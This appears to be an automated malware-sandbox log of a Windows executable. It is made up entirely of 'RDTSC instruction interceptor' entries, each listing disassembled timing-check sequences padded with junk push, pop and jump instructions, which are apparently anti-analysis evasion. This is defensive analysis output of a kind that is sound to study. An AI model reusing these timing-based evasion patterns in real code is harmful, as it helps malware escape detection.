Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1124ABA second address: 1124AC7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9308CAD926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1124AC7 second address: 1124AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F930851C688h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1124AE5 second address: 1124AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1124AEA second address: 1124AFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F930851C67Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1124381 second address: 1124387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1124387 second address: 112438B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11244F4 second address: 11244F9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11244F9 second address: 11244FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11244FF second address: 1124522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007F9308CAD932h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jc 00007F9308CAD946h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11247F0 second address: 11247FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F930851C676h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11247FB second address: 1124801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11279A7 second address: 11279C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C689h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11279C5 second address: 11279E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9308CAD936h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11279E5 second address: 11279EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112BCC5 second address: 112BCDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F9308CAD92Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112BCDE second address: 112BCFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F930851C686h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112BCFC second address: 112BD1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F9308CAD935h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112C0C2 second address: 112C0D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112C0D1 second address: 112C0D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112C0D7 second address: 112C0DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112C0DB second address: 112C107 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F9308CAD938h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F9308CAD92Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112C379 second address: 112C37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112C37F second address: 112C383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112C383 second address: 112C387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112C387 second address: 112C397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F9308CAD928h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112C4F2 second address: 112C4F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112C4F8 second address: 112C4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112C4FE second address: 112C502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112C502 second address: 112C506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 112C506 second address: 112C50C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130586 second address: 113058A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11306E8 second address: 11306EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11306EE second address: 11306F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11306F2 second address: 1130724 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C687h 0x00000007 jno 00007F930851C676h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F930851C67Bh 0x00000015 pushad 0x00000016 popad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130887 second address: 113088D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 113088D second address: 11308C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F930851C694h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F930851C680h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11309F7 second address: 11309FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11309FC second address: 1130A06 instructions: 0x00000000 rdtsc 0x00000002 je 00007F930851C67Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130A06 second address: 1130A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007F9308CAD926h 0x0000000c jmp 00007F9308CAD934h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130A26 second address: 1130A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130E49 second address: 1130E53 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9308CAD926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130E53 second address: 1130E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F930851C67Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130E6A second address: 1130E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130E6E second address: 1130E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130E72 second address: 1130E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130E78 second address: 1130E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130E7E second address: 1130E83 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130E83 second address: 1130E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F930851C67Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130E9A second address: 1130EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130EA0 second address: 1130EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F930851C681h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 jmp 00007F930851C67Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130EC9 second address: 1130EE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9308CAD92Ch 0x00000008 jng 00007F9308CAD926h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1130EE5 second address: 1130EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 113745F second address: 1137465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1137A8F second address: 1137AB8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F930851C694h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F930851C680h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1138824 second address: 113882A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 113A900 second address: 113A906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 113A906 second address: 113A90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 113A90E second address: 113A917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 113A917 second address: 113A92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD92Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 113A92A second address: 113A933 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1143094 second address: 114309B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1142295 second address: 11422AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F930851C683h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11422AF second address: 11422BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9308CAD92Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11426F9 second address: 1142714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F930851C687h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1142AF4 second address: 1142AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9308CAD926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1142AFE second address: 1142B04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1142C44 second address: 1142C4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1142DDF second address: 1142DEF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F930851C676h 0x00000008 jg 00007F930851C676h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 114C438 second address: 114C441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 114AC64 second address: 114AC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F930851C67Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 114BB9F second address: 114BBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 114BBA5 second address: 114BBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F930851C684h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 114BBC0 second address: 114BBC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 114BBC4 second address: 114BBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 114BBCC second address: 114BBD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1151FE1 second address: 1151FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1151FE5 second address: 1151FEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1151FEB second address: 1151FF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1151CE1 second address: 1151CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1151CE5 second address: 1151CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1151CF1 second address: 1151CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1151CF7 second address: 1151D17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C680h 0x00000007 jnp 00007F930851C676h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 115F568 second address: 115F591 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9308CAD938h 0x00000008 jmp 00007F9308CAD92Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 115F591 second address: 115F5B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 js 00007F930851C682h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F930851C67Ah 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push ecx 0x00000017 jo 00007F930851C68Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1163623 second address: 116362C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 116362C second address: 1163630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10813A4 second address: 10813A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C1E3 second address: 117C21D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F930851C676h 0x0000000a jp 00007F930851C676h 0x00000010 popad 0x00000011 js 00007F930851C678h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F930851C67Fh 0x00000023 jmp 00007F930851C67Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C21D second address: 117C23D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F9308CAD932h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C515 second address: 117C519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C519 second address: 117C54A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 pop edi 0x00000019 jmp 00007F9308CAD938h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C54A second address: 117C555 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F930851C676h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C6BA second address: 117C6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C6C0 second address: 117C6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C6C8 second address: 117C71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F9308CAD937h 0x0000000a pushad 0x0000000b jmp 00007F9308CAD92Ah 0x00000010 jmp 00007F9308CAD92Fh 0x00000015 jmp 00007F9308CAD933h 0x0000001a jng 00007F9308CAD926h 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C71F second address: 117C725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C725 second address: 117C72B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C72B second address: 117C731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C731 second address: 117C739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
